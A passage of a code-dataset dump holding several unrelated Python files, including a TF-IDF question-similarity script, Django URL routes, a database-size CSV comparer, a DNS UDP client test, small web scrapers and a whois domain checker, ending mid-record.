print(np.shape(qsT))\n# qComp = cosine_similarity(qsT)\n# print(qComp)\n\ndef TFIDF(questions):\n tfidf, count = createOrLoadModel()\n\n qT = tfidf.transform(count.transform(questions))\n return qT\n\ndef cosSim(q1TF, q2TF):\n cosSim = cosine_similarity(q1TF, q2TF)[0][0]\n return (cosSim >= 0.5)\n\ndef createOrLoadModel():\n if os.path.exists('TFIDF.cpickle'):\n print('FOUND MODEL')\n with open('TFIDF.cpickle') as f:\n tfidf = cPickle.load(f)\n with open('COUNT.cpickle') as f:\n count = cPickle.load(f)\n\n return tfidf, count\n else:\n print('NEW MODEL')\n df = pd.read_csv(\"quora_duplicate_questions.tsv\", delimiter='\\t')\n\n # encode questions to unicode\n df['question1'] = df['question1'].apply(lambda x: unicode(str(x),\"utf-8\"))\n df['question2'] = df['question2'].apply(lambda x: unicode(str(x),\"utf-8\"))\n\n # allQuestions = np.concatenate((df['question1'].values, df['question2'].values))\n # allSimilarities = np.concatenate((df['is_duplicate'].values, df['is_duplicate'].values))\n # dataSize = np.shape(allQuestions)\n trainPercent = 0.8\n # trainSize = np.shape(allQuestions)[0] * trainPercent\n # trainDataX = allQuestions[:trainSize]\n trainDataQ1 = df['question1'].values[:(np.shape(df['question1'])[0] * trainPercent)]\n trainDataQ2 = df['question2'].values[:(np.shape(df['question2'])[0] * trainPercent)]\n trainDataSim = df['is_duplicate'].values[:(np.shape(df['is_duplicate'])[0] * trainPercent)]\n\n testDataQ1 = df['question1'].values[(np.shape(df['question1'])[0] * trainPercent):]\n testDataQ2 = df['question2'].values[(np.shape(df['question2'])[0] * trainPercent):]\n testDataSim = df['is_duplicate'].values[(np.shape(df['is_duplicate'])[0] * trainPercent):]\n # rx = re.compile('\\W+')\n # for i in trainDataX:\n # if len(i) > 100:\n # res = rx.sub(' ', i).strip()\n # trainDataX2.append(res)\n\n # trainDataX = trainDataX2\n # print(\"size of train: {}\".format(np.shape(trainDataX)))\n # testDataX = allQuestions[trainSize:]\n # testDataY = allSimilarities[trainSize:]\n # print(testDataY)\n # print(\"size of test: {}\".format(np.shape(testDataX)))\n # print(type(trainDataX))\n print(np.shape(testDataQ1))\n print(np.shape(testDataQ2))\n print(np.shape(testDataSim))\n\n trainDataQs = np.concatenate((trainDataQ1, trainDataQ2))\n count_vect = CountVectorizer()\n X_train_counts = count_vect.fit_transform(trainDataQs)\n tfidfTrans = TfidfTransformer(smooth_idf=False)\n tfidfTrans.fit_transform(X_train_counts)\n\n # TEST\n #CALC Q1\n q1T = tfidfTrans.transform(count_vect.transform(testDataQ1))\n print(np.shape(q1T))\n #CALC Q2\n q2T = tfidfTrans.transform(count_vect.transform(testDataQ2))\n print(np.shape(q2T))\n #PERFORM cosine similarity\n probThresh = 0.5\n numCorrect = 0\n for i in range(0, np.shape(q1T)[0]):\n aCos = cosine_similarity(q1T[i, :], q2T[i, :])\n pred = (int)(aCos[0][0] >= 0.5)\n # print(aCos[0][0])\n # print(pred)\n # print(testDataSim[i])\n # print('---------------------------------')\n if pred == testDataSim[i]:\n numCorrect += 1\n # print(aCos)\n # print('--------------------------')\n print(\"correc num:{}\".format(numCorrect))\n accuracy = float(numCorrect) / float(np.shape(q1T)[0])\n print(\"accuracy: {}\".format(accuracy))\n\n # save the model\n with open('TFIDF.cpickle', 'wb') as f:\n cPickle.dump(tfidfTrans, f)\n with open('COUNT.cpickle', 'wb') as f:\n cPickle.dump(count_vect, f)\n\n return tfidfTrans, count_vect\n","sub_path":"Website/Python_connects/questionProcessing.py","file_name":"questionProcessing.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"148714552","text":"# coding=utf-8\n\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom web.auth import AuthView\n\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n # Examples:\n # url(r'^$', 'nami.views.home', name='home'),\n # url(r'^nami/', include('nami.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n url(r'^m/', include('m.urls')),\n url(r'^api/v1/', include('api_v1.urls')),\n url(r'^$', 'web.page.root'),\n)\n\nurlpatterns += patterns(\n 'web.auth',\n url(r'^auth/login$', AuthView.as_view()),\n)\n\n\nurlpatterns += patterns(\n 'web.page',\n url(r'^one$', 'one'),\n url(r'^ng/transactions$', 'ng_transactions'),\n url(r'^ng/accounts$', 'ng_accounts'),\n url(r'^ng/repeats$', 'ng_repeats'),\n url(r'^ng/accounts$', 'ng_accounts'),\n url(r'^ng/account/(?P\\d+)$', 'ng_account'),\n url(r'^ng/transaction_shadows$', 'ng_transaction_shadows'),\n url(r'^ng/transaction_shadows/paste$', 'ng_transaction_shadows_paste'),\n)\n\nurlpatterns += patterns(\n 'web.account',\n #url(r'^accounts$', 'list_'),\n url(r'^accounts/create$', 'create'),\n #url(r'accounts/(?P\\d+)/transactions$', 'transactions'),\n url(r'^accounts/(?P\\d+)/edit$', 'edit'),\n url(r'^accounts/(?P\\d+)/transactions/multi-edit$',\n 'transactions_multi_edit'),\n)\n\nurlpatterns += patterns(\n 'web.transaction',\n url(r'transactions/create$', 'create'),\n url(r'transactions/(?P\\d+)/edit$', 'edit'),\n)\n\nurlpatterns += patterns(\n 'web.repeat',\n # url(r'repeats/transactions$', 'transactions'),\n)\n","sub_path":"nami/nami/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"246200347","text":"import csv\nimport math\nimport os\nfrom datetime import date\nfrom os import walk\n\nfilenames = []\n\ndef get_files():\n #получает список файлов в директории\n #сортирует их по дате по возрастанию\n for (_, _, names) in walk(\".\"):\n for name in names:\n _file = {}\n if '.csv' in name:\n _file['name'] = name\n _file['date'] = date.fromisoformat(str(name[:-4]))\n filenames.append(_file)\n continue\n filenames.sort(key= lambda _file: _file['date'])\n if len(filenames) != 2:\n raise Exception('Неверное количество файлов в директории')\n \n\ndef normalize_data_size(input_dict):\n #метод для нормализации размеров таблиц\n #units = {\"B\": 1, \"kB\": 10**3, \"MB\": 10**6, \"GB\": 10**9, \"TB\": 10**12}\n units = {\"B\": 1, \"kB\": 2**10, \"MB\": 2**20, \"GB\": 2**30, \"TB\": 2**40}\n number, unit = [string.strip() for string in input_dict.split()]\n return int(float(number)*units[unit])\n\n\ndef hreadeble_size(size):\n power = 2**10\n n = 0\n power_labels = {0 : '', 1: 'kB', 2: 'MB', 3: 'GB', 4: 'TB'}\n if size < 0:\n msize = math.fabs(size)\n while msize > power:\n msize /= power\n n += 1\n return f\"{format(-msize, '.2f')} {power_labels[n]}\"\n else:\n while size > power:\n size /= power\n n += 1\n return f\"{format(size, '.2f')} {power_labels[n]}\"\n\n\ndef create_dict(input_file):\n #создаёт список словарей формата [{\"db_name\": название_бд, дата: размер_бд}]\n result = []\n with open(input_file['name'], 'r') as csvfile:\n filereader = csv.DictReader(csvfile)\n db_date = str(input_file['date'])\n for row in filereader:\n result.append({'db_name': row['database_name'], db_date: row['size']})\n return result\n\n\ndef create_set_of_names(*args):\n #создаёт список уникальных имен баз данных\n set_of_names = set()\n for input_file in args:\n with open(input_file, 'r') as csvfile:\n filereader = csv.DictReader(csvfile)\n for row in filereader:\n set_of_names.add(row['database_name'])\n list_of_names = sorted(set_of_names)\n return list_of_names\n\n\ndef copy_list(list1, list2, set_of_names):\n #копирование списка словарей list2 в list1 построчно\n result_list = []\n #заполняет нулями столбец с данными о размерах БД за последний месяц\n for item in set_of_names:\n d = {}\n d['db_name'] = item\n d[str(filenames[0]['date'])] = '0 kB'\n d[str(filenames[1]['date'])] = '0 kB'\n result_list.append(d)\n #построчно проходит по значениям столбца с ранними значениями\n #если находит имя БД \n for row in list1:\n for result_row in result_list:\n if row['db_name'] == result_row['db_name']:\n date = list(row.items())[1][0]\n size = list(row.items())[1][1]\n result_row[date] = size\n for row in list2:\n for result_row in result_list:\n if row['db_name'] == result_row['db_name']:\n date = list(row.items())[1][0]\n size = list(row.items())[1][1]\n result_row[date] = size\n return result_list\n \n\ndef deltaFunc(csv_list):\n #добавление столбца delta в результирующую таблицу\n return csv_list['delta']\n\n\ndef create_result_csv(result_list):\n first_date = str(filenames[0]['date'])\n second_date = str(filenames[1]['date'])\n total = {first_date: 0, second_date: 0, 'delta': 0}\n #подставил даты в названия столбцов\n for result_row in result_list:\n delta = normalize_data_size(result_row[second_date]) - normalize_data_size(result_row[first_date])\n result_row['delta'] = delta\n total[first_date] += normalize_data_size(result_row[first_date])\n total[second_date] += normalize_data_size(result_row[second_date])\n total['delta'] += delta\n result_list.sort(reverse=True, key=deltaFunc)\n for k, v in total.items():\n total[k] = hreadeble_size(v)\n for row in result_list:\n row['delta'] = hreadeble_size(row['delta'])\n result_list.append(total)\n print(result_list)\n return result_list\n\n\ndef output_csv(result_list):\n #создает результирующий csv-файл\n csv_columns = ['db_name', str(filenames[0]['date']), str(filenames[1]['date']), 'delta']\n csv_file = 'total.csv'\n try:\n with open(csv_file, 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for data in result_list:\n writer.writerow(data)\n except IOError:\n print('I/O Error')\n\nif __name__ == \"__main__\":\n get_files()\n first_file = create_dict(filenames[0])\n second_file = create_dict(filenames[1])\n set_of_names = create_set_of_names(filenames[0]['name'], filenames[1]['name'])\n copied_list = copy_list(first_file, second_file, set_of_names)\n result_csv = create_result_csv(copied_list)\n output_csv(result_csv)\n \n","sub_path":"db_size.py","file_name":"db_size.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"607798871","text":"#!/usr/bin/env python\n\nimport unittest\n\nfrom asyncdnspy.udp_client import UDPClient\nfrom asyncdnspy.dns_raw_message import DNSRawMessage\nfrom asyncdnspy.dnspy_enum import RecordType\n\n\nclass UDPClientTest(unittest.TestCase):\n\n def test_send(self):\n udp_client = UDPClient('8.8.8.8', 53)\n udp_client.connect()\n dns_raw_message = DNSRawMessage()\n data = dns_raw_message.query('google.com', RecordType.a)\n result = udp_client.send(data)\n self.assertNotEqual(result, -1)\n udp_client.close()\n\n\n def test_receive(self):\n udp_client = UDPClient('8.8.8.8', 53)\n udp_client.connect()\n dns_raw_message = DNSRawMessage()\n data = dns_raw_message.query('google.com', RecordType.a)\n result = udp_client.send(data)\n self.assertNotEqual(result, -1)\n response = udp_client.receive()\n self.assertTrue(len(response) > 0)\n udp_client.close()\n\n\n def main(self):\n self.test_send()\n self.test_receive()\n\n\nif __name__ == '__main__':\n tests = UDPClientTest()\n tests.main()\n","sub_path":"tests/test_udp_client.py","file_name":"test_udp_client.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98243324","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# theatercode 0297 is chengju cgv\nurl = 'http://www.cgv.co.kr/common/showtimes/iframeTheater.aspx?areacode=01&theatercode=0297&date=20200605'\nhtml = requests.get(url)\n\n# print(html.txet)\nsoup = BeautifulSoup(html.text, 'html.parser')\nmovie_list = soup.select('div.info-movie')\nfor i in movie_list:\n print(i.select_one('a > strong').text.strip())\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"633650481","text":"import whois\nimport datetime\nimport csv\n\nnow = datetime.datetime.now()\ndomain_list = []\n\nheaders = ['Domain','Registrar','Registrar URL','Status','Reg Name','Reg Type','Reg Street','Reg City','Reg Country','Created','Expiration','Updated']\n\nwith open('domain_results.csv', 'w', newline='') as csvfile:\n\n spamwriter = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(headers)\n \n\n # Read in the domains from the txt file into a list\n with open(\"domains.txt\", \"r\") as domains:\n for row in domains:\n domain_list.append(row.strip('\\n'))\n\n # Loop through the list and return the web page\n for domain in domain_list:\n try:\n res = whois.whois(domain)\n exp = res['expiration_date']\n expired = \"it expired on \" if exp < now else \"it expires on \"\n spamwriter.writerow([domain,res['registrar'],res['registrar_url'],res['status'],\n res['registrant_name'],res['registrant_type'],res['registrant_street'],res['registrant_city'],\n res['registrant_country'],res['creation_date'],res['expiration_date'],res['updated_date']])\n except:\n spamwriter.writerow([domain,'','','Available'])\n","sub_path":"domain_checker/domain_checker.py","file_name":"domain_checker.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"466458213","text":"# coding:utf-8\nimport urllib.request, json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'http://zhaopin.baidu.com/api/quanzhiasync?query=%E4%BA%A7%E5%93%81%E7%BB%8F%E7%90%86+%E6%8B%9B%E8%81%98&sort_type=1&city_sug=%E4%B8%8A%E6%B5%B7&detailmode=close&rn=20&pn=0'\n\nm1 = []\nm2 = []\ncontent = {}\n\nreq = urllib.request.Request(url)\nres = urllib.request.urlopen(req)\n#html = (res.read()).decode()\n\njd = json.loads(res.read())\nfor i in jd['data']['main']['data']['disp_data']:\n\tm1.append(i['age'])\n\tm2.append(i['district'])\n\ncontent['m1'] = m1\ncontent['m2'] = m2\n\njt = pd.DataFrame(content)\nprint(jt)\n","sub_path":"ai-pm.py","file_name":"ai-pm.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537913851","text":"import pathlib\n\nimport pytest\nimport respx\nfrom httpx import Response\n\nfrom tests.utils import make_snapshot\nfrom uzen.factories.scripts import ScriptFactory, get_script_sources\n\n\n@pytest.mark.asyncio\n@respx.mock\nasync def test_build_from_snapshot():\n snapshot = make_snapshot()\n snapshot.body = '